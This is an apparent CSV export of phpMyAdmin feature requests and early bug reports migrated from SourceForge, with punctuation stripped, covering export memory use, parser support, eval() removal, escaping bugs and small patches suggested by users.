Could you please help me why PMA exportDatabase ) eats up all PHP memory when exporting a 26MB db?
I am not sure this is the right way to call PMA exportDatabase ).
auth type is config .
Original URL https sourceforge.net p phpmyadmin feature requests 1660 Original author szepeviktor Attachment http sourceforge.net p phpmyadmin feature requests 1660 attachment exp1.php 5B1 5D.txt","enhancement"
"24444","6347","Support checksum table.
See https dev.mysql.com doc refman 5.6 en checksum table.html Original URL https sourceforge.net p phpmyadmin feature requests 1661 Original author madhuracj","enhancement"
"24444","6348","DB Schema comparison.
I did backup current DB schema.
We have packed php base app.
Some of our customers need to customize to accomlish their business, We do need to change DB schema, add new features.
Sometimes we got new ideas from them, and we want to merge some feature from customization to make a new packed app version.
It s very good if there is tool which help us check DB changes from old backup packed app s DB) and current customization.
Original URL https sourceforge.net p phpmyadmin feature requests 1662 Original author vchn","enhancement"
"24444","6349","Parser Support MariaDB virtual columns.
Parser does not recognize virtual columns definitions of the form <type> [GENERATED ALWAYS] AS <expression> ) [VIRTUAL | PERSISTENT] [UNIQUE] [UNIQUE KEY] [COMMENT <text>] MariaDB does not provide at least I couldn t find) a way to get <expression> for a table.
Neither information schema, nor DESCRIBE `table` provide this information and the only way is to parse the output of SHOW CREATE TABLE Reference https mariadb.com kb en mariadb virtual computed columns Original URL https sourceforge.net p phpmyadmin feature requests 1663 Original author madhuracj","enhancement"
"24444","6350","hex unhex revisited.
Hex Unhex revisited.
There is already a ticket for the inclusion of hex unhex on incoming information.
This request is to generate the unhex command on existing data when an export is performed.
This is NOT a request for just BLOB information to be unhexed.
It is a request for an option so ALL of the data be output as unhex function calls.
Such as this INSERT INTO <TABLE> VALUES unhex 3230 ), ...) Why?
As talked about on the Wikipedia SQL Injection web page http en.wikipedia.org wiki SQL injection) using hexadecimal conversion ensures no SQL injection can occur on data coming in to the database.
Since we use this feature extensively to ensure hackers can not break in to the database via SQL we would like to ensure the extracted data from the database can t get used to break in to our databases.
A different way to put this is that the hexadecimal conversion only ensures that the data is treated AS DATA.
So in a character field the SQL injection still gets stored but not executed because of the unhex ) function and how MySQL handles data that is passed through the unhex ) function.)
As such, it would be nice if phpMyAdmin could automatically produce the unhex bin2hex ) ) commands.
Original URL https sourceforge.net p phpmyadmin feature requests 1664 Original author mem007","enhancement"
"24444","6351","Improve caching.
We already have a caching mechanism see PMA Util cache functions) which is used to keep some temporary user choices, and some info from the MySQL server that we assume does not change character sets).
This mechanism is currently session based only.
Can we identify other info that we are polling from the MySQL server, which would benefit from caching and implement caching on this info if it s not too bulky).
Original URL https sourceforge.net p phpmyadmin feature requests 1665 Original author lem9","enhancement"
"24444","6352","Bring back text field with start id in navigation.
In phpmyadmin < 4.2 there was a text field to enter a number of rows to skip ahead in the browser view next to the next page navigation above the query results.
This text field disappeared after upgrading to 4.2.
This was an essential feature for me and it would be great if it could come back.
Original URL https sourceforge.net p phpmyadmin feature requests 1666 Original author bluebamboo","enhancement"
"24444","6353","Kill queries if phpMyAdmin session is expired option.
I can t find any references to this in the faqs or other tickets, so I m just adding a feature request.
Sometimes, I run long queries that run way past the timeout settings for phpMyAdmin.
These queries aren t mine, so I m not allowed to modify them.
Additionally, I m not allowed on the server or to use an ssh connection ... which is why I m using phpMyAdmin.
It s not always possible to log back into phpMyAdmin after the timeout.
It would be really helpful, if there was an option that allowed you to kill slow running queries if current session expired or kill queries belonging to that session after a certain amount of time.
I know that there are a couple of ways to achieve this on the database itself, depending on what version of MySQL server you are using but I really just want this setting limited to phpMyAdmin, not all clients and even then, only when selected.
Original URL https sourceforge.net p phpmyadmin feature requests 1667 Original author gumbopolis","enhancement"
"24444","6354","Procedures window shift click should select multiple rows.
When in the Procedures window, if I have many procedures I expect that shift clicking the first and last will select all of them like with rows in the Browse view).
That doesn t happen, could it?
Original URL https sourceforge.net p phpmyadmin feature requests 1668 Original author ibennetch","enhancement"
"24444","6355","Designer Sticky menu option.
I want an option to make the menu Sticky i.e.
follow when you scroll.
That way you can always create a relation without having to scroll back to the menu.
Original URL https sourceforge.net p phpmyadmin feature requests 1669 Original author tomelssjo","enhancement"
"24444","6356","Theme creation tool.
Linked to PR https github.com phpmyadmin phpmyadmin pull 1669, we thought about having a complete tool to create manage a pMA theme, instead of defining some specific needs.
This tool would help to create a full theme colors icons logo navigation tree style We also could imagine to be able to load an existing theme to duplicate update it.
Original URL https sourceforge.net p phpmyadmin feature requests 1670 Original author tithugues","enhancement"
"24444","6357","Directly show table comments in structure view.
phpMyAdmin supports table comments.
These can be viewed in table pages, or in a schema s structure page, but only as tooltips.
I would like to directly see comments in schema structure pages.
Considering that encoding and loss have columns by default, I think a truncated version of comments is as relevant and can be added by default, but if not, an option could do.
Original URL https sourceforge.net p phpmyadmin feature requests 1671 Original author chealer","enhancement"
"24444","6358","MIME types should be lower case.
MIME types are normally lower case but in PMA MIME type and Browser display transformation) they re title case.
That looks weird.
Original URL https sourceforge.net p phpmyadmin feature requests 1672 Original author olafvdspek","enhancement"
"24444","6359","Language for the data of a column.
Hi, in order to enable the spell checking of the browser it would be nice to be able to set a language for each column of a table for instance one can be English while the other French ).
This value would be used as soon as a row is created, during edition and at display thanks to the HTML lang attribute.
Original URL https sourceforge.net p phpmyadmin feature requests 1674 Original author romain2boss","enhancement"
"24444","6360","Add support for INET6 ATON and INET6 NTOA.
This function was added in MySQL 5.6.3. http dev.mysql.com doc refman 5.6 en miscellaneous functions.html Original URL https sourceforge.net p phpmyadmin feature requests 1675 Original author tomsommer","enhancement"
"24444","6361","Link to get real row counts of all the views in a db, at once.
Hi, The Db structure.php should provide an option to fetch all the Real Row counts for views at once).
The placement of the link can be next to the With Selected div below the tables and views listing.
Should we include a icon for this or a simple link, like shown in the screenshot attached, is enough ?
Original URL https sourceforge.net p phpmyadmin feature requests 1676 Original author deven bansod Attachment http sourceforge.net p phpmyadmin feature requests 1676 attachment GetRealRowCounts.png","enhancement"
"24444","6362","Support spatial indexes in table create form.
Original URL https sourceforge.net p phpmyadmin feature requests 1677 Original author madhuracj","enhancement"
"24444","6363","Eliminate remaining occurences of eval ) in phpMyAdmin to make it work on machines where eval ) is disabled.
A few of the PHP scripts in phpMyAdmin use the eval ) language construct of PHP.
However, some hosts disable that feature for security reasons, e.g.
[with the help of Suhosin] http suhosin.org stories configuration.html suhosin executor disable eval suhosin.executor.disable eval ).
Hence, phpMyAdmin will not work on hosts with such configurations.
Could you please rewrite the affected scripts there are only a few as of release 4.4.8) so that they do not use eval ) at all?
That would allow folks to use phpMyAdmin on machines that disabled eval ).
Relevant scripts might be the following git repos phpmyadmin grep rn fixed strings eval include .php .
.
libraries Advisor.class.php 346 eval value = .
expr .
; ); .
libraries php gettext gettext.php 361 eval string ); There might be more occurences of eval ) in earlier releases.)
Original URL https sourceforge.net p phpmyadmin feature requests 1678 Original author thoronador","enhancement"
"24444","6364","Ctrl Enter to insert row in Table >Insert.
It would be useful if ctrl enter or similar submits the form in Table > Insert page.
Original URL https sourceforge.net p phpmyadmin feature requests 1679 Original author nisargjhaveri","enhancement"
"24444","6365","Human readable writable URLs.
It would be nice to have pretty URLs in phpMyAdmin.
for example, something like ` table db name table name structure` for tbl structure and so on.
Currently, It is not easy to hand write a URL and go to specific page.
We have to go through the UI all the way from index and it is painful sometimes on slow connections.
Most of the time, it is not even possible to easily know the URL of current page.
Or at least, I would suggest to get rid of the microhistory part of the URL with html5 history API whenever possible.
Original URL https sourceforge.net p phpmyadmin feature requests 1680 Original author nisargjhaveri","enhancement"
"24444","6366","combine create alter table statements.
when i make table structure export, the result is not efficent for ex it makes alter table statement and after it makes another alter just to set auto increment there should be single alter table where possible thanks Original URL https sourceforge.net p phpmyadmin feature requests 1681 Original author freeman3","enhancement"
"24444","6367","Add quick action features.
Hi there.
What about adding a quick delete truncate icon next to table name?
Also, it would be nice to edit a table or field name just by double clicking it.
Sorry if this kind of ticket was created before.
Thx.
Original URL https sourceforge.net p phpmyadmin feature requests 1682 Original author avlexzander","enhancement"
"24444","6368","Edit links should be active only for non Read only variables.
Hi, The Edit links next to the variable name on Variables page i.e.
server variables.php) should be enabled active) only for non read only i.e.
dynamic) variables .
Original URL https sourceforge.net p phpmyadmin feature requests 1683 Original author deven bansod","enhancement"
"24444","6369","Multi query persistent console with tabbed results?.
This is my first ever request on SourceForge, I can t see anything similar in the feature requests.
So...
I m really struggling to use PhpMyAdmin as effectively and efficiently as I can use a console.
Until recently I had database console access via PhpStorm but with recent business wide security changes this was taken away and we now must all use PhpMyAdmin.
Is there any way to get PhpMyAdmin to behave more like a serious console based database management system?
For example, SQLyog or the database console in PhpStorm.
I use PhpStorm for development and having to switch back and forth between that IDE and a web based interface is very slow and clumsy.
Also, when I run a query it d be nice to be able to have just one persistent query window that retains the data between browser sessions save locally?)
and results from each query appear in tabbed areas beneath the main query window.
Is there could there be) some sort of API that PhpStorm could plug into?
Original URL https sourceforge.net p phpmyadmin feature requests 1687 Original author sfmtdd1970","enhancement"
"24444","6370","Fix Directory given to Mysql in Windows.
Mysql do not accept the common windows directory description with \...
In ldi check.php you will receive if in an Windows environment) a file path like c \winnt\temp\php11.tmp So to pass this path to MySQL, it will be needed to change all \ into or put a \ in front of all existent \... You need to addslashes textfile) before sending it to mysql...
Original URL https sourceforge.net p phpmyadmin bugs 1 https sourceforge.net p phpmyadmin bugs 1 Original author anonymous","bug"
"24444","6371","stylesheet bug.
phpmyadmin has differnet dom paths for IE and other browsers, it should be modified to work with all dom capable browsers, see http bugzilla.mozilla.org show bug.cgi?id=66791 this bug relates to 2.1, but I guess this hasn t fixed yet?)
Original URL https sourceforge.net p phpmyadmin bugs 2 https sourceforge.net p phpmyadmin bugs 2 Original author anonymous","bug"
"24444","6372","font in stylesheet for thai language.
The demo site has the hard code font in the style sheet section.
Arial, Helvetica, sans serif from header.inc.php3) This will affect the display of thai font and maybe other non europian font as well).
I suggest the system that sourceforge is using, ie.
it have a standard fonts about 3) to include in the stylesheet for each language.
So I can specify the font to use for thai.
Original URL https sourceforge.net p phpmyadmin bugs 3 https sourceforge.net p phpmyadmin bugs 3 Original author korakot","bug"
"24444","6373","Bug in help path to MySQL website.
help path on MySQL website is buggy.
One extra slash in it.
Original URL https sourceforge.net p phpmyadmin bugs 4 https sourceforge.net p phpmyadmin bugs 4 Original author robbat2","bug"
"24444","6374","Language select error.
Hi I just installed the latest version and received this message.
Warning Undefined index en gb in select lang.inc.php on line 43 I am running Win2000,IIS5,PHP4.
I looked around various files to see if anything was setup wrong and everything seemed OK In the config file these are the language settings.
cfgDefaultLang = amp;quot;en amp;quot;; cfgLang = amp;quot;en amp;quot;; The error was the same with and without cfgLang I can get everything up and running if I add this line to the language array txt langname[ en gb ] = amp;quot;english.inc.php amp;quot;; Thanks Pete Kelly Original URL https sourceforge.net p phpmyadmin bugs 5 https sourceforge.net p phpmyadmin bugs 5 Original author trafficg","bug"
"24444","6375","Browse table bug.
Browse a table with 70 records, click amp;quot;End amp;quot;, then press amp;quot;previous amp;quot; once.
Now at this point the amp;quot;Previous amp;quot; and amp;quot;Begin amp;quot; buttons stop working.
or Browse a table with 50 records, next click amp;quot;End amp;quot;.
Now at this point the amp;quot;Previous amp;quot; and amp;quot;Begin amp;quot; buttons stop working.
During these examples everything was set to the default parameters.
Have fun ) Original URL https sourceforge.net p phpmyadmin bugs 6 https sourceforge.net p phpmyadmin bugs 6 Original author trafficg","bug"
"24444","6376","backup restore database.
Hi I have known about this error for a while now and it caused me loads of hassle in the past, luckily I can use telnet now to backup and restore my databases but a lot of users cannot.
The problems are caused by symbols within the data.
I have attached a sample database, if you can restore this data you have solved 90 of the problems in this area.
Another bug I have come across is, if your on a server that only supports safemode, and you try and upload a file, php will return a amp;quot;permission denied amp;quot; error when you try and read the file.
Here is a helpful url.
http www.aota.net ubb Forum15 HTML 000671 1.html Good luck with these bugs.
If you need a hand testing any code in safe mode I will help you out.
Pete Kelly Original URL https sourceforge.net p phpmyadmin bugs 7 https sourceforge.net p phpmyadmin bugs 7 Original author trafficg","bug"
"24444","6377","Problem editing rows with large BLOBs.
Some BLOBs whose size I have not determined) are too large to be edited.
It does not seem to be based on the datatype, but rather the amount of space used.
Original URL https sourceforge.net p phpmyadmin bugs 8 https sourceforge.net p phpmyadmin bugs 8 Original author anonymous","bug"
"24444","6378","magic quotes?.
Hi I have been using the orgiinal MyAdmin and it is great .. shame works not continued .. which is why i was gald to find your here.
Only problem.. pasting SQL into old version works fine with quotes e.g.
DEFAULT = 0 But on your version it escapes them with \ 0\ which creates an SQL error.
Original URL https sourceforge.net p phpmyadmin bugs 9 https sourceforge.net p phpmyadmin bugs 9 Original author anonymous","bug"
"24444","6379","Enum 2 case null.
If a field is an ENUM i.e.
ENUM TRUE , FALSE ) but not with NOT Null.
phpMyAdmin dont give the possibilities to empty the field.
In insert or change Form for a record.
Now In french because my English is perhaps too bad.
si on a un champs ENUM xc5x95 2 cas par exemple ENUM TRUE , FALSE ) mais pas avec NOT Null dans un formulaire insert ou modif d enregistrement, phpMyAdmin ne permet pas de laisser le champ amp;quot;vide amp;quot; NULL.
Original URL https sourceforge.net p phpmyadmin bugs 10 https sourceforge.net p phpmyadmin bugs 10 Original author anonymous","bug"
"24444","6380","Display xx records on the select page.
On the select page tbl select.php3), when you you suppress the 30 default value in the display xx records per page or put a non numeric value) then click go, you ve the following sql error amp;lt; amp;gt; Error SQL query SELECT ... sql request ... where 1 MySQL said amp;lt; amp;gt; and nothing else ...
Proposed patch on file amp;quot;tbl select.php3 amp;quot;, on line 115 116 before amp;quot;header amp;quot;Header amp;quot;Location ... amp;quot;), add require amp;quot;config.inc.php3 amp;quot;); we need cfgMaxRows ... if sessionMaxRows = 0) == 0) \{ sessionMaxRows = cfgMaxRows;\} Since I don t know if it might break something else, would someone look at this and apply if safe ; ) ).
Original URL https sourceforge.net p phpmyadmin bugs 11 https sourceforge.net p phpmyadmin bugs 11 Original author hal0802","bug"
"24444","6381","Import a csv file failed.
Hello, I ve a problem with the import of a csv file into a table.
The version of phpMyAdmin is 2.2.0pre3 After submitting the import page, the following error message appears Error MySQL Query was empty This problem comes up if the magic quotes gpc is not enabled.
I have a ISP with and one without magic quotes gpc enabled) After this error i try the old version 2.1.0 and thsi version import these csv file.
Is this a bug?
Percy Original URL https sourceforge.net p phpmyadmin bugs 12 https sourceforge.net p phpmyadmin bugs 12 Original author anonymous","bug"
"24444","6382","Error when editing an entry from a subset.
Hi, I get an error if I select a subset of rows with the select option, or by a given query edit a single entry save it Phpmyadmin wants to return to the subset of rows and gives this error Warning Supplied argument is not a valid MySQL result resource in home projects phpmyadmin phpmyadmin.openeye.nl sql.
php3 on line 72 Database openeye table CommInfo Error SQL query SELECT Id,Value from CommInfo where 1 and Value like MySQL said You have an error in your SQL syntax near at line 1 Back This is not a valid query indeed...
Thanks, Stijn.
Original URL https sourceforge.net p phpmyadmin bugs 13 https sourceforge.net p phpmyadmin bugs 13 Original author stijn","bug"
"24444","6383","Advanced Mode Failed.
hi , i run Mysql 3.23.38 Apache 1.3.19 php 4.0.5 When cfgServers[1][ adv auth ] = false; cfgServers[1][ user ] = root ; cfgServers[1][ password ] = pass ; everything works very well When cfgServers[1][ adv auth ] = true; cfgServers[1][ stduser ] = root ; cfgServers[1][ stdpass ] = pass ; i have a prompt for username password i enter login root pass pass and it doesn t work i can connect with command line to the sql server with the same login pass the Officiel release work well Best regards Zappy Original URL https sourceforge.net p phpmyadmin bugs 14 https sourceforge.net p phpmyadmin bugs 14 Original author anonymous","bug"
"24444","6384","PHP Warnings.
Warning mysql db query is deprecated; use mysql select db ) and mysql query ) instead in home httpd htdocs phpmyadmin sql.php3 on line 69 Warnings like this are generated when the warning level is set appropriately.
Software like phpMyAdmin should work smoothly even at the highest error reporting level.
Original URL https sourceforge.net p phpmyadmin bugs 16 https sourceforge.net p phpmyadmin bugs 16 Original author anonymous","bug"
"24444","6385","Do not show Insert or modify.
Hi, After Vxc3xa9rifier la table [Documentation] Analyser la table [Documentation] Rxc3xa9parer la table [Documentation] Optimiser la table [Documentation] you should not be allowed to insert or modify...
When I try it I get Warning Supplied argument is not a valid MySQL result resource in c anetpub www mysql tbl change.php3 on line 46 John.
Original URL https sourceforge.net p phpmyadmin bugs 15 https sourceforge.net p phpmyadmin bugs 15 Original author jonx","bug"
"24444","6386","please add stripslashes ) in db read dum.
Hi.
In db read dump you can enter a sql Query.
If you give something like select from bla where blo amp;gt; bla then it says something like syntax error select from bla where blo amp;gt;\ bla\ changing the line 29 in db read dump from sql query = trim sql query); to sql query = trim stripslashes sql query)); solves the Problem.
Just a quickie!
Thanks Tex Original URL https sourceforge.net p phpmyadmin bugs 17 https sourceforge.net p phpmyadmin bugs 17 Original author anonymous","bug"
"24444","6387","Table type in dump.
Have to do amp;quot;table type amp;quot; in backup of tables.
Original URL https sourceforge.net p phpmyadmin bugs 18 https sourceforge.net p phpmyadmin bugs 18 Original author marciojc","bug"
"24444","6388","missing a in lang german.inc.php3.
there is a missing in lang german.inc.php3 line 135 ... amp;lt;snip amp;gt; Parse error parse error in website apache mysql.webert.de lang german.inc.php3 on line 135 amp;lt; snap amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 19 https sourceforge.net p phpmyadmin bugs 19 Original author rockoo","bug"
"24444","6389","Czech translation.
Line 142 of czech win1250.inc.php3 the character is missing... Milos Original URL https sourceforge.net p phpmyadmin bugs 20 https sourceforge.net p phpmyadmin bugs 20 Original author anonymous","bug"
"24444","6390","annoying Warning, and missing some info.
when there is a field in a table containing from , it happens that on row 75 in sql.php3 i am using version 2.2.0pre5) the split ) doesn t split ok since it gets the from from the field name and as from part of the query apears something like ,otherfield,onotherfield from atable name ..... i hope i explained it clear ) my solution is to split with array=split from |FROM , sql query,2); with spaces after from and FROM Original URL https sourceforge.net p phpmyadmin bugs 21 https sourceforge.net p phpmyadmin bugs 21 Original author cecot","bug"
"24444","6391","bookmarks don t work.
when to try to bookmark a query, it displays a amp;quot;warning sql query not defined amp;quot; here s the solution simply add this line to sql.php3 where all the inputs for bookmarks are written amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;sql query amp;quot; value= amp;quot; amp;quot; amp;gt; The diff u result sql.php3 Tue May 29 00 10 33 2001 sql.php3 Wed Jun 6 11 47 26 2001 146,6 146,7 amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;fields[dbase] amp;quot; value= amp;quot; amp;lt;?php echo db;?
amp;gt; amp;quot; amp;gt; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;fields[query] amp;quot; value= amp;quot; amp;lt;?php echo isset sql query) ?
sql query amp;quot; amp;quot;;?
amp;gt; amp;quot; amp;gt; amp;lt;input type= amp;quot;text amp;quot; name= amp;quot;fields[label] amp;quot; value= amp;quot; amp;quot; amp;gt; \ amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;sql query amp;quot; value= amp;quot; amp;quot; amp;gt; amp;lt;input type= amp;quot;submit amp;quot; value= amp;quot; amp;lt;?php echo strBookmarkThis; ?
amp;gt; amp;quot; amp;gt; amp;lt; form amp;gt; amp;lt;?php Original URL https sourceforge.net p phpmyadmin bugs 22 https sourceforge.net p phpmyadmin bugs 22 Original author haiken","bug"
"24444","6392","show processes columns have shifted.
this is what it looks like.. it seems like the action kill) doesnt have a column?
Id User Host db Command Time State Info KILL 1 root localhost Sleep 1 KILL 2 root localhost phpwebsite Sleep 39744 KILL 3 root localhost phpwebsite Sleep 39817 Original URL https sourceforge.net p phpmyadmin bugs 23 https sourceforge.net p phpmyadmin bugs 23 Original author anonymous","bug"
"24444","6393","sql query missing.
when adding new records phpmyadmin shows the sqlquery in a box above the table that loads after.
in 2.2 pre5 the box is there but it is empty.
Original URL https sourceforge.net p phpmyadmin bugs 24 https sourceforge.net p phpmyadmin bugs 24 Original author anonymous","bug"
"24444","6394","Php error from the Run SQL query form.
When you try to run a wrong SELECT query from the Run SQL query you obtain a an annoying amp;quot;Warning Supplied argument is not a valid MySQL result resource in amp;lt;snip amp;gt; sql.php3 on line 77 amp;quot; then the normal mysql error message only for SELECT queries).
Proposed Patch against current CVS) file sql.php3 line 77 replace ... SelectNumRows = mysql result OPresult, 0 , count ); ... by if OPresult) \{ SelectNumRows = mysql result OPresult, 0 , count ); \} Regards.
Original URL https sourceforge.net p phpmyadmin bugs 25 https sourceforge.net p phpmyadmin bugs 25 Original author hal0802","bug"
"24444","6395","Percent bug in delete queries.
When entering a delete query in a textarea with followed by a number ie delete from table where field like 2000 ) give a wrong confirmation delete from table where field like 00 ) and wrong query because 20 is transmitted as is in the URL and 20 is the escape sequence for space.
My guess is that somewhere the should be escaped before redirecting... Too lazy to look into the code right now ;)) Original URL https sourceforge.net p phpmyadmin bugs 26 https sourceforge.net p phpmyadmin bugs 26 Original author ziwap","bug"
"24444","6396","warning when a table is dropped.
When you drop a table, there is a warning amp;quot;headers already sent amp;quot;) because the file header.inc.php3 is included in sql.php3 then main.php3 included by sql.php3).
Solution We can t use include once php4) so here s a little diff against sql.php3.
Please apply if correct since either my cvs account still doesn t work or I m too dumb to make it work under Windows may be the second solution).
Original URL https sourceforge.net p phpmyadmin bugs 27 https sourceforge.net p phpmyadmin bugs 27 Original author hal0802","bug"
"24444","6397","Dashes in database name break PHPMyAdmin.
Dashes s ) in a database name break amp;quot;Browse amp;quot; queries in PHPMyAdmin v2.2.0pre5 To duplicate, create a database with a dash in it... such as db test When you try to browse the fields in a table, it will reject it as a bad query, dropping everything before the first dash.
This problem did not exist in previous versions.
Original URL https sourceforge.net p phpmyadmin bugs 28 https sourceforge.net p phpmyadmin bugs 28 Original author ratt","bug"
"24444","6398","quotes into manual requests.
Text areas for submitting manual SQL requests amp;quot;Exxc3xa9cuter une ou des requxc4x99tes sur la base xxx amp;quot; in FR lang.)
don t stand backslashed quote characters in a string.
for example INSERT into xxx a) values Who\ s online ); Pascal.
Original URL https sourceforge.net p phpmyadmin bugs 29 https sourceforge.net p phpmyadmin bugs 29 Original author anonymous","bug"
"24444","6399","IE 5.5 and quot;Add a new user quot;.
BY nobody DATE 2001 06 29 01 10 SUBJECT Add a new User doesnt work.... Hello, phpMyAdmin 2.3.0alpha 20010604 with IE 5.50 browser.
If i try to add new user error message line 86 char 9 error anyhost.0 is null or not an object code 0 url .... user details.php?.........
line 174 char 9 error elements.length is null or not an object Thanks Andras Original URL https sourceforge.net p phpmyadmin bugs 30 https sourceforge.net p phpmyadmin bugs 30 Original author lem9","bug"
"24444","6400","Odd behaviour after drop database.
When a database is dropped you are returned to the phpMyAdmin home screen with the following information at the top of the screen Database foo table Database foo table where foo is the name of the database just dropped.
Observed for phpmyadmin 2.2.0pre5 php 4.0.6 on FreeBSD.
Regards, Neil Darlow.
Original URL https sourceforge.net p phpmyadmin bugs 31 https sourceforge.net p phpmyadmin bugs 31 Original author ndarlow","bug"
"24444","6401","Database lockout.
phpMyAdmin 2.2.0pre5.
Reproduce as follows 1) drop the only existing database for a user 2) phpmyadmin home screen appears with create database entry 3) hit Reload Refresh on your browser 4) phpmyadmin home screen appears without create database entry 5) user is now unable to create databases Regards, Neil Darlow.
Original URL https sourceforge.net p phpmyadmin bugs 32 https sourceforge.net p phpmyadmin bugs 32 Original author ndarlow","bug"
"24444","6402","No mixed quot; and possible.
Is isn t possible to delete database entries with amp;quot; and mixed in it.
If you would save the follow HTML code in a test field and want to delete it with phpMyAdmin, the hidden field of sql.php3 has a problem ... amp;lt;a href= amp;quot;linkedpage.html amp;quot; onMouseOver= amp;quot;statusIn In Statusbar Text );return true amp;quot; onMouseOut= amp;quot;statusOut Out Statusbar Text); amp;quot; amp;gt;Link amp;lt; a amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 33 https sourceforge.net p phpmyadmin bugs 33 Original author anonymous","bug"
"24444","6403","rc1.
The tree structure in the new version rc1) shows some bugs.
There are spaces between some tables on the tree view..
Original URL https sourceforge.net p phpmyadmin bugs 34 https sourceforge.net p phpmyadmin bugs 34 Original author kostik","bug"
"24444","6404","Optimize table link returns page not fou.
Whin I click on the [Optmimize table] link under Space Usage, I get a page not found error.
The [Optimize table] link at the bottom of the page works fine though.
Jesper Original URL https sourceforge.net p phpmyadmin bugs 35 https sourceforge.net p phpmyadmin bugs 35 Original author anonymous","bug"
"24444","6405","Konqueror 2.1.2 browser support.
Hi, Here are two main problems when using phpMyAdmin with Konqueror at least for Konqueror 2.1.2) 1) the DB list on the left still doesn t expand certainly due on too much reliance on JavaScript) when you click on a DB it just displays the DB view on the right.
There s an error in initIt ), style.display seems to be poorly supported line 147 in rc1) amp;quot;JS Type error.
Null value amp;quot;.
2) running a query on a database doesn t display the results but displays amp;quot;Your SQL query has been executed successfully amp;quot; followed by the table list, the same happens with a bookmarked query.
But queries runned from a table view do work.
This problem doesn t appear with Opera 5.0 for Linux for Solaris, so it s really a problem with Konqueror Hope you could solve these problems or maybe they ll vanish by themselves with Konqueror 2.2 !)
Original URL https sourceforge.net p phpmyadmin bugs 36 https sourceforge.net p phpmyadmin bugs 36 Original author hparissi","bug"
"24444","6406","MySQL Error when trying to delete.
Here is a some sample data from my db.
agentID timestamp scope varName varValue 338 20010706133258 1 code key s 4 amp;quot;hello amp;quot;; If I try to delete this record, it produces the following error Error SQL query DELETE FROM player agentstate WHERE agentID = 338 AND timestamp = 20010706133258 AND scope = 1 AND varName = code key AND varValue = s 4 \ MySQL said You have an error in your SQL syntax near s 4 \ at line 1 Original URL https sourceforge.net p phpmyadmin bugs 37 https sourceforge.net p phpmyadmin bugs 37 Original author epsilon7","bug"
"24444","6407","extchg.sh not recursive.
Small but annoying thing the extchg.sh doesn t process the files in subdirectories, for example the language files...
So it breakes everything.
Can t work on it tonight party ), but if you have nothing to do this night... ) Original URL https sourceforge.net p phpmyadmin bugs 38 https sourceforge.net p phpmyadmin bugs 38 Original author swix","bug"
"24444","6408","grant revoke in user details.
The backquotes don t seem to work with grant revoke, find another way to protect the db names and table names.
Original URL https sourceforge.net p phpmyadmin bugs 39 https sourceforge.net p phpmyadmin bugs 39 Original author lem9","bug"
"24444","6409","Javascript runtime error in left frame.
I ve just installed v. 2.2.0rc1 and when I connect to phpmyadmin I get this javascript debug message Line 144 Error expandedDB is undefined The error is in the function InitIt if isDOM) \{ var tempColl = document.getElementsByTagName DIV ); var tempCollCnt = tempColl.length; for var i = 0; i amp;lt; tempCollCnt; i ) \{ line 144 amp;gt; amp;gt; amp;gt; if tempColl[i].id == expandedDb) tempColl[i].style.display = block ; else if tempColl[i].className == child ) tempColl[i].style.display = none ; \} \} end of the DOM case This is my config.inc.php3 changes cfgDefaultLang = amp;quot;da amp;quot;; cfgServers[1][ adv auth ] = true; cfgServerDefault = 0; I get no problems with this config.inc.php3 cfgDefaultLang = amp;quot;da amp;quot;; cfgServers[1][ adv auth ] = true cfgServerDefault = 1 so I guess that it s cfgServerDefault = 0; that causes the problem Original URL https sourceforge.net p phpmyadmin bugs 40 https sourceforge.net p phpmyadmin bugs 40 Original author curlingcity","bug"
"24444","6410","Bug with amp;amp;amp; characters type.
When you try to execute the query with amp;amp; xxxx; caracters, like DELETE FROM inscrit WHERE pseudo= test amp;amp; 039;ap ; PHPMyAdmin fail because during the confirmation step, it translate amp;amp; 039; to PHPMyAdmin should escape amp;amp; before trying to process the query.
Another minor bug With HEAP Table, Optimise table option is available whereas it s not possible to execute The handler for the table doesn t support check repair).
Same thing about verify, repair, analyze ) Original URL https sourceforge.net p phpmyadmin bugs 41 https sourceforge.net p phpmyadmin bugs 41 Original author anonymous","bug"
"24444","6411","PHP errors in left frame.. amp;lt;b amp;gt;Warning amp;lt; b amp;gt; Unable to save MySQL query result in amp;lt;b amp;gt; home httpd html admin phpMyAdmin devel left.php3 amp;lt; b amp;gt; on line amp;lt;b amp;gt;112 amp;lt; b amp;gt; amp;lt;br amp;gt; appears in the left frame between two databases.
This doesn t appear to have a serious effect, but is definately not pretty.
Original URL https sourceforge.net p phpmyadmin bugs 42 https sourceforge.net p phpmyadmin bugs 42 Original author anonymous","bug"
"24444","6412","Optimize, Analyse only if tbl type allow.
Those functions are not supported on every table types.
Original URL https sourceforge.net p phpmyadmin bugs 43 https sourceforge.net p phpmyadmin bugs 43 Original author lem9","bug"
"24444","6413","Displaced links with NS4.
With the latest scripts from the CVS and with NS4 only, some links on the database and table screens are displaced below their associated bullets.
The problem seems to be related to the style= amp;quot;margin bottom 10px amp;quot; used as usually NS4 doesn t support valid CSS statements Original URL https sourceforge.net p phpmyadmin bugs 44 https sourceforge.net p phpmyadmin bugs 44 Original author loic1","bug"
"24444","6414","dots on db name.
If db name contains some .
i get an error.
For example if db is named amp;quot;mydb.new amp;quot; the sql amp;quot;SELECT FROM amp;quot;.
db name.
amp;quot;.
amp;quot;.table name amp;quot;; is translated in SELECT FROM my.db.mytable FazeN Original URL https sourceforge.net p phpmyadmin bugs 45 https sourceforge.net p phpmyadmin bugs 45 Original author anonymous","bug"
"24444","6415","deepthought does not exist.
If I have gotten this through to you already, please forgive the replication.
sourceforge says to login even though I already have; twice, damnit.
In 2.2.0RC1 in Documentation.html and in INSTALL, the reference to http deepthought.texsci.edu does not exist.
That s a bug amp;lt;g amp;gt;.
John support chsoft.com Original URL https sourceforge.net p phpmyadmin bugs 46 https sourceforge.net p phpmyadmin bugs 46 Original author jknemeyer","bug"
"24444","6416","Error wint old php version.
with the version of php installed by my isp 3.???)
I eceive the folowing error message Fatal error Call to unsupported or undefined function extension loaded ) in .
lib.inc.php3 on line 14 Original URL https sourceforge.net p phpmyadmin bugs 47 https sourceforge.net p phpmyadmin bugs 47 Original author anonymous","bug"
"24444","6417","Javascript error on Left frame IE 4.0).
